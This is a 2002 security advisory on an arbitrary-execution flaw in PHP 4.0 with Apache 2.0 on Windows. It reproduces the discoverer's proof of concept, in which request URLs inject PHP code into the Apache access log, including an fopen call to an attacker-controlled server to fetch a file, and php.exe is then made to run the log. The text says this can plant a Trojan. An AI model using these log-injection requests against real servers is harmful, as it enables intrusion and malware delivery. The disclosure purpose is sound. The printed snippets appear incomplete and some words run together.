Arbitrary Execution Vulnerability in PHP 4.0
A vulnerability exists in PHP 4.0 for Windows using Apache Web Server 2.0. By exploiting PHP's ability to view files residing outside the normal HTML root directory.
January 24, 2002
Reported January 23, 2002, byPaul Brereton.
VERSIONS AFFECTED
PHP version 4.0 using Apache Web Server 2.0 for Windows 2000 and Windows NT
DESCRIPTION
Avulnerability exists in PHP 4.0 for Windows using Apache Web Server 2.0. By exploitingPHP's ability to view files residing outside the normal HTML root directory, anattacker can execute arbitrary code by inserting a malicious PHP-based commandinto the Apache log file.
DEMONSTRATION
The discoverer posted the followingdemonstration as proof-of-concept:
1)Create a text file on your Web Server called mytestfile.txt.
2) Write a short line of text in it.
3) Check how big the file is (in bytes).
4) Test that the file can be accessed via your browser by typing http://[YOUR_SERVER_IP]/mytestfile.txt.
5) Check that the file exists on the server by typing http://www.example.com/mytestfile.txtinto your browser.
6) You now have to make 4 requests. (If the browser doesn't seem to connect,don't worry, it is. Don't press refresh in any step, otherwise this will notwork. Remember to replace the brackets on the first two lines.)
7) Make the request in your browser. http://www.example.com/<?$fp=fopen("http://[YOUR_SERVER_IP]/mytestfile.txt","rb");?>
8) Wait for about 10 seconds.
9) Make the request in your browser. http://www.example.com/
10) Wait for about 10 seconds.
11) Make the request in your browser. http://www.example.com/<?$fq=fopen("c:/Apache2/htdocs/mytestfile.txt","wb");?>
12) Wait for about 10 Seconds.
13) Make the request in your browser. http://www.example.com/
14) Wait for about 10 seconds.
15) Make a request for a non-existent file (to flush the access log) by typinghttp://www.example.com/nonexistantfile.htm.
16) Wait for about 10 seconds.
17) Get php.exe to parse the Apache log file by typing http://www.example.com/php/php.exe?c:apache2logsaccess.log.
18) Press Refresh to make sure the log file has been parsed.
19) Check for the file on server by typing http://www.example.com/mytestfile.txt.
What happens is that php.exe runs the php code that has been logged in theApache log file. The code in the Apache log file, then tells the server todownload the file from your server and save it into the Apache directory.
The file uploaded can be a Trojan, .exe file, .php file, etc. There is nolimitation to what and where you can upload.
It's a very simple task to write a Trojan with CGI headers and to execute itonce uploaded. VENDOR RESPONSE Thevendor, PHP, has been notified. CREDIT
Discovered by PaulBrereton.
About the Author
You May Also Like